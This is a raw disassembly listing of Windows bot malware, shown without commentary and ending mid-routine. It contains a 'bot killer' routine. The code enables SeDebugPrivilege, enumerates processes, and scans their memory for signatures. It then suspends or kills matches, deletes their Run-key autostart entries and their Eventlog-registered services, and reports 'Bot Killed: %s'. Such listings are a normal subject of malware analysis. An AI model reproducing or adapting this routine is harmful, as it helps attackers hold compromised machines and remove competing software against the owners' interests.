		push	eax
		push	[ebp+var_8]
		lea	ecx, [ebp+var_20]
		push	ecx
		push	eax
		push	[ebp+arg_0]
		call	esi ; sub_440B96
		call	edi	; RtlGetLastWin32Error
		neg	eax
		sbb	al, al
		inc	al

loc_41A0BD:				; CODE XREF: sub_41A025+25j
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_41A025	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41A0C2	proc near		; CODE XREF: sub_41A690+400p

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		push	ebx
		push	esi
		push	edi
		lea	eax, [ebp+var_8]
		push	eax
		push	[ebp+arg_8]
		xor	ebx, ebx
		push	[ebp+arg_C]
		mov	[ebp+var_8], ebx
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	dword_427BB0
		test	eax, eax
		jnz	short loc_41A0F9

loc_41A0E9:				; CODE XREF: sub_41A0C2+70j
					; sub_41A0C2+74j
		push	[ebp+arg_C]
		call	sub_402F5B
		pop	ecx
		pop	edi
		pop	esi
		mov	al, bl
		pop	ebx
		leave
		retn
; ---------------------------------------------------------------------------

loc_41A0F9:				; CODE XREF: sub_41A0C2+25j
		xor	eax, eax

loc_41A0FB:				; CODE XREF: sub_41A0C2+6Cj
		and	[ebp+var_4], 0
		mov	edx, offset dword_426BC0

loc_41A104:				; CODE XREF: sub_41A0C2+66j
		mov	esi, [ebp+arg_C]
		mov	ecx, [edx+80h]
		add	esi, eax
		mov	edi, edx
		xor	ebx, ebx
		repe cmpsb
		jz	short loc_41A134
		mov	ecx, 84h
		add	[ebp+var_4], ecx
		add	edx, ecx
		cmp	[ebp+var_4], 318h
		jb	short loc_41A104
		inc	eax
		cmp	eax, [ebp+var_8]
		jbe	short loc_41A0FB
		xor	bl, bl
		jmp	short loc_41A0E9
; ---------------------------------------------------------------------------

loc_41A134:				; CODE XREF: sub_41A0C2+53j
		mov	bl, 1
		jmp	short loc_41A0E9
sub_41A0C2	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41A138	proc near		; CODE XREF: sub_41A690+483p

var_1C		= dword	ptr -1Ch
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 1Ch
		lea	eax, [ebp+var_1C]
		push	eax
		push	[ebp+arg_4]
		mov	[ebp+var_1C], 1Ch
		call	dword_427BAC
		test	eax, eax
		jnz	short loc_41A15A
		xor	al, al
		leave
		retn
; ---------------------------------------------------------------------------

loc_41A15A:				; CODE XREF: sub_41A138+1Cj
					; sub_41A138+55j
		mov	eax, [ebp+var_10]
		cmp	eax, [ebp+arg_0]
		jnz	short loc_41A17E
		push	[ebp+var_14]
		push	0
		push	1F03FFh
		call	dword_427BC0
		push	eax
		call	ds:off_41D0D0
		cmp	eax, 0FFFFFFFFh
		jz	short loc_41A18F

loc_41A17E:				; CODE XREF: sub_41A138+28j
		lea	eax, [ebp+var_1C]
		push	eax
		push	[ebp+arg_4]
		call	dword_427BD0
		test	eax, eax
		jnz	short loc_41A15A

loc_41A18F:				; CODE XREF: sub_41A138+44j
		push	[ebp+arg_4]
		call	ds:dword_41D0D8	; CloseHandle
		mov	al, 1
		leave
		retn
sub_41A138	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41A19C	proc near		; CODE XREF: sub_41A690+3BDp

var_1C		= dword	ptr -1Ch
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 1Ch
		lea	eax, [ebp+var_1C]
		push	eax
		push	[ebp+arg_4]
		mov	[ebp+var_1C], 1Ch
		call	dword_427BAC
		test	eax, eax
		jnz	short loc_41A1BE
		xor	al, al
		leave
		retn
; ---------------------------------------------------------------------------

loc_41A1BE:				; CODE XREF: sub_41A19C+1Cj
					; sub_41A19C+55j
		mov	eax, [ebp+var_10]
		cmp	eax, [ebp+arg_0]
		jnz	short loc_41A1E2
		push	[ebp+var_14]
		push	0
		push	1F03FFh
		call	dword_427BC0
		push	eax
		call	ds:off_41D0D4
		cmp	eax, 0FFFFFFFFh
		jz	short loc_41A1F3

loc_41A1E2:				; CODE XREF: sub_41A19C+28j
		lea	eax, [ebp+var_1C]
		push	eax
		push	[ebp+arg_4]
		call	dword_427BD0
		test	eax, eax
		jnz	short loc_41A1BE

loc_41A1F3:				; CODE XREF: sub_41A19C+44j
		push	[ebp+arg_4]
		call	ds:dword_41D0D8	; CloseHandle
		mov	al, 1
		leave
		retn
sub_41A19C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41A200	proc near		; CODE XREF: sub_41A690+3D4p

var_228		= dword	ptr -228h
var_214		= dword	ptr -214h
var_210		= dword	ptr -210h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 228h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		push	edi
		push	[ebp+arg_0]
		xor	ebx, ebx
		push	8
		call	dword_427BB4
		mov	edi, eax
		cmp	edi, 0FFFFFFFFh
		jnz	short loc_41A239

loc_41A229:				; CODE XREF: sub_41A200+53j
		xor	al, al

loc_41A22B:				; CODE XREF: sub_41A200+8Dj
		mov	ecx, [ebp+var_4]
		pop	edi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		leave
		retn
; ---------------------------------------------------------------------------

loc_41A239:				; CODE XREF: sub_41A200+27j
		lea	eax, [ebp+var_228]
		push	eax
		push	edi
		mov	[ebp+var_228], 224h
		call	dword_427BA8
		test	eax, eax
		jz	short loc_41A229

loc_41A255:				; CODE XREF: sub_41A200+6Bj
		inc	ebx
		cmp	ebx, 1
		jz	short loc_41A271
		lea	eax, [ebp+var_228]
		push	eax
		push	edi
		call	dword_427BC4
		test	eax, eax
		jnz	short loc_41A255
		xor	bl, bl
		jmp	short loc_41A284
; ---------------------------------------------------------------------------

loc_41A271:				; CODE XREF: sub_41A200+59j
		mov	eax, [ebp+var_214]
		mov	[esi], eax
		mov	eax, [ebp+var_210]
		mov	[esi+4], eax
		mov	bl, 1

loc_41A284:				; CODE XREF: sub_41A200+6Fj
		push	edi
		call	ds:dword_41D0D8	; CloseHandle
		mov	al, bl
		jmp	short loc_41A22B
sub_41A200	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=1B4h


sub_41A28F	proc near		; CODE XREF: sub_41A645+2Dp

var_234		= dword	ptr -234h
var_230		= dword	ptr -230h
var_22C		= dword	ptr -22Ch
var_228		= dword	ptr -228h
var_224		= dword	ptr -224h
var_220		= dword	ptr -220h
var_21C		= dword	ptr -21Ch
var_218		= dword	ptr -218h
var_214		= dword	ptr -214h
var_210		= dword	ptr -210h
var_20C		= dword	ptr -20Ch
var_208		= dword	ptr -208h
var_204		= byte ptr -204h
var_104		= byte ptr -104h
var_103		= byte ptr -103h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		lea	ebp, [esp-1B4h]
		sub	esp, 234h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+1B4h+var_4], eax
		mov	eax, [ebp+1B4h+arg_0]
		push	ebx
		push	esi
		push	edi
		xor	ebx, ebx
		push	0FFh
		mov	[ebp+1B4h+var_224], eax
		lea	eax, [ebp+1B4h+var_103]
		push	ebx
		push	eax
		mov	[ebp+1B4h+var_234], offset aSoftwareMicr_4 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		mov	[ebp+1B4h+var_230], offset aSoftwareMicr_5 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		mov	[ebp+1B4h+var_22C], offset aSoftwareMicr_6 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		mov	[ebp+1B4h+var_228], offset aSoftwareMicr_7 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		mov	[ebp+1B4h+var_104], bl
		call	sub_407F20
		mov	esi, 100h
		add	esp, 0Ch
		mov	[ebp+1B4h+var_21C], esi
		mov	[ebp+1B4h+var_214], esi
		mov	[ebp+1B4h+var_20C], offset dword_426BB4
		mov	[ebp+1B4h+var_220], 2

loc_41A308:				; CODE XREF: sub_41A28F+160j
		mov	[ebp+1B4h+var_208], ebx

loc_41A30B:				; CODE XREF: sub_41A28F+153j
		mov	eax, [ebp+1B4h+var_208]
		mov	eax, [ebp+eax*4+1B4h+var_234]
		lea	ecx, [ebp+1B4h+var_210]
		push	ecx
		push	1
		push	ebx
		push	eax
		mov	eax, [ebp+1B4h+var_20C]
		push	dword ptr [eax]
		call	ds:off_41D02C
		test	eax, eax
		jnz	loc_41A3D2
		lea	eax, [ebp+1B4h+var_214]
		push	eax
		lea	eax, [ebp+1B4h+var_204]
		push	eax
		push	ebx
		push	ebx
		lea	eax, [ebp+1B4h+var_21C]
		push	eax
		lea	eax, [ebp+1B4h+var_104]
		push	eax
		mov	[ebp+1B4h+var_218], ebx
		push	ebx
		jmp	short loc_41A3BE
; ---------------------------------------------------------------------------

loc_41A348:				; CODE XREF: sub_41A28F+13Dj
		xor	edi, edi

loc_41A34A:				; CODE XREF: sub_41A28F+10Cj
		mov	eax, [ebp+1B4h+var_224]
		lea	edx, [eax+1]

loc_41A350:				; CODE XREF: sub_41A28F+C6j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41A350
		sub	eax, edx
		push	eax
		push	[ebp+1B4h+var_224]
		lea	eax, [ebp+edi+1B4h+var_204]
		push	eax
		call	sub_402DA9
		add	esp, 0Ch
		test	eax, eax
		jnz	short loc_41A389
		lea	eax, [ebp+1B4h+var_104]
		push	eax
		mov	eax, [ebp+1B4h+var_208]
		push	[ebp+eax*4+1B4h+var_234]
		mov	eax, [ebp+1B4h+var_20C]
		push	dword ptr [eax]
		call	sub_417722
		add	esp, 0Ch

loc_41A389:				; CODE XREF: sub_41A28F+DDj
		lea	eax, [ebp+1B4h+var_204]
		inc	edi
		lea	edx, [eax+1]

loc_41A390:				; CODE XREF: sub_41A28F+106j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41A390
		sub	eax, edx
		cmp	edi, eax
		jbe	short loc_41A34A
		inc	[ebp+1B4h+var_218]
		lea	eax, [ebp+1B4h+var_214]
		push	eax
		lea	eax, [ebp+1B4h+var_204]
		push	eax
		push	ebx
		push	ebx
		lea	eax, [ebp+1B4h+var_21C]
		push	eax
		lea	eax, [ebp+1B4h+var_104]
		push	eax
		push	[ebp+1B4h+var_218]
		mov	[ebp+1B4h+var_21C], esi
		mov	[ebp+1B4h+var_214], esi

loc_41A3BE:				; CODE XREF: sub_41A28F+B7j
		push	[ebp+1B4h+var_210]
		call	ds:off_41D020
		cmp	eax, 103h
		jnz	loc_41A348

loc_41A3D2:				; CODE XREF: sub_41A28F+98j
		push	[ebp+1B4h+var_210]
		call	ds:dword_41D010	; RegCloseKey
		inc	[ebp+1B4h+var_208]
		cmp	[ebp+1B4h+var_208], 4
		jb	loc_41A30B
		add	[ebp+1B4h+var_20C], 4
		dec	[ebp+1B4h+var_220]
		jnz	loc_41A308
		mov	ecx, [ebp+1B4h+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		add	ebp, 1B4h
		leave
		retn
sub_41A28F	endp


; =============== S U B	R O U T	I N E =======================================



sub_41A40D	proc near		; CODE XREF: sub_41A45D+189p

arg_0		= dword	ptr  4

		push	ebx
		push	esi
		push	edi
		push	0F003Fh
		push	0
		push	0
		call	ds:off_41D024
		push	0F01FFh
		push	[esp+10h+arg_0]
		mov	esi, eax
		push	esi
		call	ds:off_41D044
		mov	edi, eax
		mov	ebx, edi
		call	sub_419F50
		push	edi
		call	ds:off_41D03C
		test	eax, eax
		jz	short loc_41A459
		mov	bl, 1

loc_41A447:				; CODE XREF: sub_41A40D+4Ej
		push	esi
		mov	esi, ds:off_41D040
		call	esi ; sub_449E59
		push	edi
		call	esi ; sub_449E59
		pop	edi
		pop	esi
		mov	al, bl
		pop	ebx
		retn
; ---------------------------------------------------------------------------

loc_41A459:				; CODE XREF: sub_41A40D+36j
		xor	bl, bl
		jmp	short loc_41A447
sub_41A40D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=2C0h


sub_41A45D	proc near		; CODE XREF: sub_41A645+35p
					; sub_41A645:loc_41A682p

var_340		= dword	ptr -340h
var_33C		= dword	ptr -33Ch
var_338		= dword	ptr -338h
var_334		= byte ptr -334h
var_234		= byte ptr -234h
var_233		= byte ptr -233h
var_134		= byte ptr -134h
var_133		= byte ptr -133h
var_34		= byte ptr -34h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		lea	ebp, [esp-2C0h]
		sub	esp, 340h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+2C0h+var_4], eax
		push	esi
		mov	eax, [ebp+2C0h+arg_0]
		push	edi
		push	0Bh
		pop	ecx
		mov	esi, offset aSystemControls ; "SYSTEM\\ControlSet001\\Services\\Eventlog\\"...
		lea	edi, [ebp+2C0h+var_34]
		rep movsd
		movsw
		mov	esi, 0FFh
		push	esi
		mov	[ebp+2C0h+var_340], eax
		xor	edi, edi
		lea	eax, [ebp+2C0h+var_233]
		push	edi
		push	eax
		mov	[ebp+2C0h+var_234], 0
		call	sub_407F20
		push	esi
		lea	eax, [ebp+2C0h+var_133]
		push	edi
		push	eax
		mov	[ebp+2C0h+var_134], 0
		call	sub_407F20
		add	esp, 18h
		lea	eax, [ebp+2C0h+var_33C]
		push	eax
		push	0F003Fh
		push	edi
		lea	eax, [ebp+2C0h+var_34]
		push	eax
		push	80000002h
		call	ds:off_41D02C
		test	eax, eax
		jnz	loc_41A625
		push	ebx
		mov	ebx, 100h
		push	ebx
		lea	eax, [ebp+2C0h+var_134]
		push	eax
		push	edi
		push	[ebp+2C0h+var_33C]
		mov	[ebp+2C0h+var_338], edi
		call	ds:off_41D018
		cmp	eax, 103h
		jz	loc_41A624
		jmp	short loc_41A51A
; ---------------------------------------------------------------------------

loc_41A515:				; CODE XREF: sub_41A45D+1C1j
		mov	esi, 0FFh

loc_41A51A:				; CODE XREF: sub_41A45D+B6j
		push	ebx
		lea	eax, [ebp+2C0h+var_334]
		push	edi
		push	eax
		call	sub_407F20
		push	ebx
		lea	eax, [ebp+2C0h+var_234]
		push	edi
		push	eax
		call	sub_407F20
		lea	eax, [ebp+2C0h+var_134]
		push	eax
		lea	eax, [ebp+2C0h+var_34]
		push	eax
		push	offset aSS_5	; "%s\\%s"
		lea	eax, [ebp+2C0h+var_234]
		push	esi
		push	eax
		call	sub_402EAE
		lea	eax, [ebp+2C0h+var_234]
		add	esp, 2Ch
		lea	esi, [eax+1]

loc_41A55F:				; CODE XREF: sub_41A45D+107j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_41A55F
		sub	eax, esi
		mov	[ebp+eax+2C0h+var_234],	cl
		lea	eax, [ebp+2C0h+var_134]
		push	offset aLdm	; "LDM"
		push	eax
		call	sub_402C69
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_41A602
		push	7
		mov	edi, offset aNetdde ; "NetDDE"
		lea	esi, [ebp+2C0h+var_134]
		pop	ecx
		xor	eax, eax
		repe cmpsb
		jz	short loc_41A600
		push	ebx
		lea	eax, [ebp+2C0h+var_334]
		push	eax
		push	offset aEventmessagefi ; "EventMessageFile"
		lea	eax, [ebp+2C0h+var_234]
		push	eax
		push	1
		call	sub_4176BD
		add	esp, 14h
		test	al, al
		jz	short loc_41A600
		xor	esi, esi

loc_41A5BB:				; CODE XREF: sub_41A45D+1A1j
		mov	eax, [ebp+2C0h+var_340]
		lea	edx, [eax+1]

loc_41A5C1:				; CODE XREF: sub_41A45D+169j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_41A5C1
		sub	eax, edx
		push	eax
		push	[ebp+2C0h+var_340]
		lea	eax, [ebp+esi+2C0h+var_334]
		push	eax
		call	sub_402DA9
		add	esp, 0Ch
		test	eax, eax
		jnz	short loc_41A5EC
		lea	eax, [ebp+2C0h+var_134]
		push	eax
		call	sub_41A40D
		pop	ecx

loc_41A5EC:				; CODE XREF: sub_41A45D+180j
		lea	eax, [ebp+2C0h+var_334]
		inc	esi
		lea	edx, [eax+1]

loc_41A5F3:				; CODE XREF: sub_41A45D+19Bj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_41A5F3
		sub	eax, edx
		cmp	esi, eax
		jbe	short loc_41A5BB

loc_41A600:				; CODE XREF: sub_41A45D+13Bj
					; sub_41A45D+15Aj
		xor	edi, edi

loc_41A602:				; CODE XREF: sub_41A45D+127j
		inc	[ebp+2C0h+var_338]
		push	ebx
		lea	eax, [ebp+2C0h+var_134]
		push	eax
		push	[ebp+2C0h+var_338]
		push	[ebp+2C0h+var_33C]
		call	ds:off_41D018
		cmp	eax, 103h
		jnz	loc_41A515

loc_41A624:				; CODE XREF: sub_41A45D+B0j
		pop	ebx

loc_41A625:				; CODE XREF: sub_41A45D+8Aj
		push	[ebp+2C0h+var_33C]
		call	ds:dword_41D010	; RegCloseKey
		mov	ecx, [ebp+2C0h+var_4]
		pop	edi
		xor	ecx, ebp
		pop	esi
		call	sub_402AD0
		add	ebp, 2C0h
		leave
		retn
sub_41A45D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41A645	proc near		; CODE XREF: sub_41A690+42Ap

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	0FFFFFFFFh
		push	[ebp+arg_0]
		call	ds:off_41D0F4
		test	eax, eax
		jz	short loc_41A68C
		push	7D0h
		call	ds:off_41D0F8
		push	[ebp+arg_4]
		call	ds:off_41D0CC
		test	eax, eax
		push	[ebp+arg_8]
		jz	short loc_41A682
		call	sub_41A28F
		push	[ebp+arg_8]
		call	sub_41A45D
		pop	ecx
		jmp	short loc_41A687
; ---------------------------------------------------------------------------

loc_41A682:				; CODE XREF: sub_41A645+2Bj
		call	sub_41A45D

loc_41A687:				; CODE XREF: sub_41A645+3Bj
		pop	ecx
		mov	al, 1
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_41A68C:				; CODE XREF: sub_41A645+10j
		xor	al, al
		pop	ebp
		retn
sub_41A645	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41A690	proc near		; DATA XREF: sub_41C28D+390o

var_569		= byte ptr -569h
var_568		= dword	ptr -568h
var_564		= dword	ptr -564h
var_560		= dword	ptr -560h
var_55C		= dword	ptr -55Ch
var_558		= dword	ptr -558h
var_554		= dword	ptr -554h
var_550		= dword	ptr -550h
var_54C		= dword	ptr -54Ch
var_548		= dword	ptr -548h
var_540		= dword	ptr -540h
var_524		= byte ptr -524h
var_420		= byte ptr -420h
var_318		= byte ptr -318h
var_317		= byte ptr -317h
var_210		= byte ptr -210h
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 56Ch
		mov	eax, dword_423064
		xor	eax, esp
		mov	[esp+56Ch+var_4], eax
		push	ebx
		push	esi
		push	edi
		xor	ebx, ebx
		push	103h
		lea	eax, [esp+57Ch+var_317]
		push	ebx
		push	eax
		mov	[esp+584h+var_318], bl
		call	sub_407F20
		add	esp, 0Ch
		mov	[esp+578h+var_558], offset dword_4207F4
		mov	[esp+578h+var_554], offset dword_420804
		mov	[esp+578h+var_550], offset dword_420810
		call	sub_402EA8	; GetCurrentProcessId
		mov	edi, ds:dword_41D0E0
		push	offset aOpenthread ; "OpenThread"
		push	offset aKernel32_dll_0 ; "kernel32.dll"
		mov	[esp+580h+var_54C], eax
		call	edi	; GetModuleHandleA
		mov	esi, ds:off_41D0E8
		push	eax
		call	esi ; sub_45AAC8
		push	offset aOpenprocess ; "OpenProcess"
		push	offset aKernel32_dll_1 ; "kernel32.dll"
		mov	dword_427BC0, eax
		call	edi	; GetModuleHandleA
		push	eax
		call	esi ; sub_45AAC8
		push	offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
		push	offset aKernel32_dll_2 ; "kernel32.dll"
		mov	dword_427BCC, eax
		call	edi	; GetModuleHandleA
		push	eax
		call	esi ; sub_45AAC8
		push	offset aProcess32first ; "Process32First"
		push	offset aKernel32_dll_3 ; "kernel32.dll"
		mov	dword_427BB4, eax
		call	edi	; GetModuleHandleA
		push	eax
		call	esi ; sub_45AAC8
		push	offset aProcess32next ;	"Process32Next"
		push	offset aKernel32_dll_4 ; "kernel32.dll"
		mov	dword_427BB8, eax
		call	edi	; GetModuleHandleA
		push	eax
		call	esi ; sub_45AAC8
		push	offset aModule32first ;	"Module32First"
		push	offset aKernel32_dll_5 ; "kernel32.dll"
		mov	dword_427BBC, eax
		call	edi	; GetModuleHandleA
		push	eax
		call	esi ; sub_45AAC8
		push	offset aModule32next ; "Module32Next"
		push	offset aKernel32_dll_6 ; "kernel32.dll"
		mov	dword_427BA8, eax
		call	edi	; GetModuleHandleA
		push	eax
		call	esi ; sub_45AAC8
		push	offset aThread32first ;	"Thread32First"
		push	offset aKernel32_dll_7 ; "kernel32.dll"
		mov	dword_427BC4, eax
		call	edi	; GetModuleHandleA
		push	eax
		call	esi ; sub_45AAC8
		push	offset aThread32next ; "Thread32Next"
		push	offset aKernel32_dll_8 ; "kernel32.dll"
		mov	dword_427BAC, eax
		call	edi	; GetModuleHandleA
		push	eax
		call	esi ; sub_45AAC8
		push	offset aReadprocessmem ; "ReadProcessMemory"
		push	offset aKernel32_dll_9 ; "kernel32.dll"
		mov	dword_427BD0, eax
		call	edi	; GetModuleHandleA
		push	eax
		call	esi ; sub_45AAC8
		push	offset aGetmodulefilen ; "GetModuleFileNameExA"
		push	offset aPsapi_dll ; "psapi.dll"
		mov	dword_427BB0, eax
		call	ds:off_41D0E4
		push	eax
		call	esi ; sub_45AAC8
		cmp	dword_427BC0, ebx
		mov	dword_427BC8, eax
		jz	loc_41AB5B
		cmp	dword_427BCC, ebx
		jz	loc_41AB5B
		cmp	dword_427BB4, ebx
		jz	loc_41AB5B
		cmp	dword_427BB8, ebx
		jz	loc_41AB5B
		cmp	dword_427BBC, ebx
		jz	loc_41AB5B
		cmp	dword_427BA8, ebx
		jz	loc_41AB5B
		cmp	dword_427BC4, ebx
		jz	loc_41AB5B
		cmp	dword_427BAC, ebx
		jz	loc_41AB5B
		cmp	dword_427BD0, ebx
		jz	loc_41AB5B
		cmp	dword_427BB0, ebx
		jz	loc_41AB5B
		cmp	eax, ebx
		jz	loc_41AB5B
		mov	edi, 104h
		push	edi
		lea	eax, [esp+57Ch+var_318]
		push	eax
		call	ds:dword_41D0F0	; GetSystemDirectoryA
		lea	eax, [esp+578h+var_558]
		xor	esi, esi
		mov	[esp+578h+var_568], eax

loc_41A877:				; CODE XREF: sub_41A690+238j
		mov	ecx, [esp+578h+var_568]
		push	dword ptr [ecx]
		lea	ecx, [esp+57Ch+var_318]
		push	ecx
		push	offset aSS_2	; "%s\\%s"
		lea	eax, [esp+esi+584h+var_210]
		push	103h
		push	eax
		call	sub_402EAE
		lea	eax, [esp+esi+58Ch+var_210]
		add	esp, 14h
		lea	ecx, [eax+1]

loc_41A8A9:				; CODE XREF: sub_41A690+21Ej
		mov	dl, [eax]
		inc	eax
		cmp	dl, bl
		jnz	short loc_41A8A9
		add	[esp+578h+var_568], 4
		sub	eax, ecx
		add	eax, esi
		add	esi, edi
		cmp	esi, 30Ch
		mov	[esp+eax+578h+var_210],	bl
		jb	short loc_41A877

loc_41A8CA:				; CODE XREF: sub_41A690+4C6j
		push	ebx
		push	0Fh
		mov	[esp+580h+var_548], 128h
		call	dword_427BB4
		lea	ecx, [esp+578h+var_548]
		push	ecx
		push	eax
		mov	[esp+580h+var_55C], eax
		call	dword_427BB8
		test	eax, eax
		jz	loc_41AB4B
		jmp	loc_41AB34
; ---------------------------------------------------------------------------

loc_41A8F8:				; CODE XREF: sub_41A690+4B5j
		mov	edi, ds:off_41D100
		lea	eax, [esp+578h+var_564]
		push	eax
		push	ebx
		push	28h
		mov	[esp+584h+var_569], 1
		call	edi ; sub_446314
		mov	esi, ds:off_41D038
		push	eax
		call	esi ; sub_45A2CE
		test	eax, eax
		jnz	short loc_41A94C
		call	ds:dword_41D0EC	; RtlGetLastWin32Error
		cmp	eax, 3F0h
		jnz	short loc_41A948
		push	2
		call	ds:off_41D030
		test	eax, eax
		jnz	short loc_41A937
		mov	[esp+578h+var_569], bl

loc_41A937:				; CODE XREF: sub_41A690+2A1j
		lea	eax, [esp+578h+var_564]
		push	eax
		push	ebx
		push	28h
		call	edi ; sub_446314
		push	eax
		call	esi ; sub_45A2CE
		test	eax, eax
		jnz	short loc_41A94C

loc_41A948:				; CODE XREF: sub_41A690+295j
		mov	[esp+578h+var_569], bl

loc_41A94C:				; CODE XREF: sub_41A690+288j
					; sub_41A690+2B6j
		push	1
		push	offset aSedebugprivile ; "SeDebugPrivilege"
		push	[esp+580h+var_564]
		call	sub_41A025
		add	esp, 0Ch
		test	al, al
		jnz	short loc_41A971
		push	[esp+578h+var_564]
		call	ds:dword_41D0D8	; CloseHandle
		mov	[esp+578h+var_569], bl

loc_41A971:				; CODE XREF: sub_41A690+2D1j
		push	[esp+578h+var_540]
		push	ebx
		push	1F0FFFh
		call	dword_427BCC
		cmp	eax, ebx
		mov	[esp+578h+var_568], eax
		jnz	short loc_41A98D
		mov	[esp+578h+var_569], bl

loc_41A98D:				; CODE XREF: sub_41A690+2F7j
		mov	esi, 104h
		push	esi
		lea	eax, [esp+57Ch+var_420]
		push	ebx
		push	eax
		call	sub_407F20
		add	esp, 0Ch
		push	esi
		lea	eax, [esp+57Ch+var_420]
		push	eax
		push	ebx
		push	[esp+584h+var_568]
		call	dword_427BC8
		mov	[esp+578h+var_560], ebx
		lea	edi, [esp+578h+var_210]

loc_41A9C3:				; CODE XREF: sub_41A690+352j
		lea	eax, [esp+578h+var_420]
		push	eax
		push	edi
		call	sub_402C69
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_41A9E6
		inc	[esp+578h+var_560]
		add	edi, esi
		cmp	[esp+578h+var_560], 3
		jb	short loc_41A9C3
		jmp	short loc_41A9EA
; ---------------------------------------------------------------------------

loc_41A9E6:				; CODE XREF: sub_41A690+345j
		mov	[esp+578h+var_569], bl

loc_41A9EA:				; CODE XREF: sub_41A690+354j
		cmp	[esp+578h+var_569], bl
		jz	loc_41AB1A
		push	ebx
		push	offset aSedebugprivi_0 ; "SeDebugPrivilege"
		push	[esp+580h+var_564]
		call	sub_41A025
		xor	eax, eax
		lea	edi, [esp+584h+var_558]
		stosd
		stosd
		mov	eax, [esp+584h+var_54C]
		add	esp, 0Ch
		cmp	[esp+578h+var_540], eax
		jz	loc_41AB1A
		lea	eax, [esp+578h+var_524]
		push	offset aSystem	; "System"
		push	eax
		call	sub_402C69
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	loc_41AB1A
		mov	esi, [esp+578h+var_540]
		push	ebx
		push	4
		call	dword_427BB4
		cmp	eax, 0FFFFFFFFh
		jz	loc_41AB1A
		push	eax
		push	esi
		call	sub_41A19C
		cmp	al, bl
		pop	ecx
		pop	ecx
		jz	loc_41AB1A
		push	[esp+578h+var_540]
		lea	esi, [esp+57Ch+var_558]
		call	sub_41A200
		test	al, al
		pop	ecx
		jz	loc_41AAFF
		push	[esp+578h+var_554]
		call	sub_402A08
		cmp	eax, ebx
		pop	ecx
		jnz	short loc_41AA83
		push	ebx
		jmp	short loc_41AAF9
; ---------------------------------------------------------------------------

loc_41AA83:				; CODE XREF: sub_41A690+3EEj
		push	eax
		push	[esp+57Ch+var_554]
		push	[esp+580h+var_558]
		push	[esp+584h+var_568]
		call	sub_41A0C2
		add	esp, 10h
		cmp	al, bl
		jz	short loc_41AAFF
		push	100h
		call	sub_402A08
		pop	ecx
		mov	esi, eax
		lea	eax, [esp+578h+var_524]
		push	eax
		lea	eax, [esp+57Ch+var_420]
		push	eax
		push	[esp+580h+var_568]
		call	sub_41A645
		add	esp, 0Ch
		test	al, al
		jz	short loc_41AAF8
		push	esi
		call	sub_402E05
		pop	ecx
		push	eax
		mov	ebx, offset aNn	; "­­ÏÀÛÝ"
		call	sub_419EC1
		pop	ecx
		lea	eax, [esp+578h+var_420]
		push	eax
		push	offset aBotKilledS ; "Bot Killed: %s"
		push	esi
		push	0
		push	offset dword_427FFC
		call	sub_417B51
		add	esp, 14h
		xor	ebx, ebx

loc_41AAF8:				; CODE XREF: sub_41A690+434j
		push	esi

loc_41AAF9:				; CODE XREF: sub_41A690+3F1j
		call	sub_402F5B
		pop	ecx

loc_41AAFF:				; CODE XREF: sub_41A690+3DCj
					; sub_41A690+40Aj
		mov	esi, [esp+578h+var_540]
		push	ebx
		push	4
		call	dword_427BB4
		cmp	eax, 0FFFFFFFFh
		jz	short loc_41AB1A
		push	eax
		push	esi
		call	sub_41A138
		pop	ecx
		pop	ecx

loc_41AB1A:				; CODE XREF: sub_41A690+35Ej
					; sub_41A690+386j ...
		push	[esp+578h+var_564]
		mov	esi, ds:dword_41D0D8
		call	esi	; CloseHandle
		push	[esp+578h+var_568]
		call	esi	; CloseHandle
		push	1
		call	ds:off_41D0F8

